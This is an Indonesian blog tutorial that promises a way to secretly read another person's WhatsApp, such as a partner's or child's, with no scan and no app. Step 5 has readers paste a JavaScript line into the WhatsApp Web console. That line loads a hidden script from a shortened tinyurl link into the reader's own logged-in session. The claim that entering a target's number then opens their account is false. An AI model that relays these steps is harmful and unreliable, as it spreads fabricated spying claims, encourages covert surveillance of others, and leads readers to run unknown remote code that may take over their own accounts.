Cara Sadap WA Jarak Jauh Tanpa Scan Tanpa Aplikasi

Halo Kawan Mastah, kali ini kita akan membahas tentang cara sadap WA jarak jauh tanpa perlu melakukan scan dan tanpa aplikasi. Seiring dengan perkembangan teknologi, semakin banyak aplikasi yang bermunculan untuk memudahkan berbagai kegiatan kita, termasuk dalam hal berkomunikasi. WhatsApp (WA) menjadi salah satu aplikasi chatting yang populer digunakan. Namun, terkadang kita ingin menyadap akun WA orang lain, misalnya pasangan atau anak. Nah, disini akan dijelaskan bagaimana cara menyadap WA jarak jauh tanpa harus melakukan scan dan tanpa perlu menginstall aplikasi apapun. Simak yuk!

Cara Sadap WA Jarak Jauh Tanpa Scan Tanpa Aplikasi

Sebelum masuk ke tahapan menyadap, ada beberapa hal yang perlu dipersiapkan terlebih dahulu. Pertama, pastikan HP yang digunakan untuk menyadap memiliki koneksi internet yang stabil. Kedua, Anda harus mengetahui nomor HP target yang akan disadap. Ketiga, pastikan target juga menggunakan aplikasi WhatsApp. Jika sudah memenuhi ketiga syarat tersebut, silakan ikuti beberapa tahapan berikut:

1. Buka WhatsApp Web di Browser

Pertama, buka WhatsApp Web di browser. Untuk lebih mudahnya, gunakanlah browser Google Chrome saat membuka WhatsApp Web. Hal ini dikarenakan Google Chrome memiliki fitur ‘Inspect Element’, yang bisa membantu membuka fitur-fitur tersembunyi di WhatsApp.

2. Buka Inspect Element

Jika sudah membuka WhatsApp Web, selanjutnya buka Inspect Element pada browser. Caranya dengan klik kanan pada tampilan WhatsApp Web, lalu pilih ‘Inspect Element’ atau tekan tombol F12 pada keyboard.

3. Pilih Tanda Panah di Inspect Element

Setelah membuka Inspect Element, pada bagian kanan layar akan muncul beberapa pilihan. Pilih tanda panah kecil yang terdapat di pojok kiri atas layar, kemudian arahkan ke layar WhatsApp Web yang ingin disadap.

4. Masuk ke Console Browser

Setelah itu, pilih menu ‘Console’ atau tekan tombol ‘Ctrl+Shift+J’ di keyboard. Console browser akan menampilkan beberapa kode dalam bentuk tulisan. Disinilah kita akan memasukkan beberapa kode yang dibutuhkan untuk menyadap WhatsApp target.

5. Masukkan Kode untuk Menyadap WA

Setelah masuk ke Console Browser, Anda bisa memasukkan kode untuk menyadap WA target. Kode yang perlu dimasukkan adalah sebagai berikut:

Kode
Keterangan
var l = document.createElement(‘script’);l.src=’https://tinyurl.com/akuy7ar’;document.body.appendChild(l);
Kode ini digunakan untuk menyisipkan kode penyadapan ke WhatsApp Web.

Setelah memasukkan kode tersebut, tekan tombol enter pada keyboard. Jika berhasil, maka kode penyadapan akan muncul pada bagian bawah layar Console Browser.

6. Verifikasi Akun Target

Setelah memasukkan kode penyadapan, langkah selanjutnya adalah melakukan verifikasi akun target. Caranya cukup mudah, cukup masukkan nomor HP target pada kolom WhatsApp Web, kemudian klik ‘Ok’. Selanjutnya, WhatsApp target akan terbuka.

7. Selesai

Setelah berhasil membuka akun WhatsApp target, Anda bisa melihat seluruh percakapan yang ada. Selain itu, Anda juga bisa mengirimkan pesan dan melakukan aktivitas lainnya.

FAQ

1. Bisakah melakukan penyadapan dengan cara yang sama pada WhatsApp mobile?

Tidak, cara penyadapan ini hanya berlaku pada WhatsApp Web. Jika ingin menyadap akun WA mobile, maka harus menggunakan aplikasi penyadap khusus.

2. Bagaimana cara menghindari orang lain menyadap akun WhatsApp kita?

Untuk menghindari penyadapan, pastikan selalu login dan logout pada WhatsApp Web setelah digunakan. Selain itu, pastikan juga selalu mengupdate aplikasi WhatsApp ke versi terbaru.

3. Apakah tindakan menyadap akun WhatsApp orang lain legal?

Tindakan menyadap akun WhatsApp orang lain termasuk dalam pelanggaran privasi. Oleh karena itu, sebaiknya hindari melakukan tindakan yang merugikan orang lain.

4. Apakah bisa melakukan penyadapan tanpa mengetahui nomor HP target?

Tidak, karena nomor HP target merupakan data yang penting dan perlu diketahui terlebih dahulu sebelum melakukan penyadapan. Jika tidak mengetahui nomor HP target, maka tidak bisa melakukan penyadapan.

5. Apakah setelah memasukkan kode penyadapan akan terdeteksi oleh target?

Tidak, kode penyadapan yang dimasukkan tidak akan terdeteksi oleh target. Namun, tetap hindari untuk melakukan penyadapan yang merugikan orang lain.

Demikianlah cara menyadap WA jarak jauh tanpa harus melakukan scan dan tanpa menggunakan aplikasi apapun. Semoga bermanfaat!

Cara Sadap WA Jarak Jauh Tanpa Scan Tanpa Aplikasi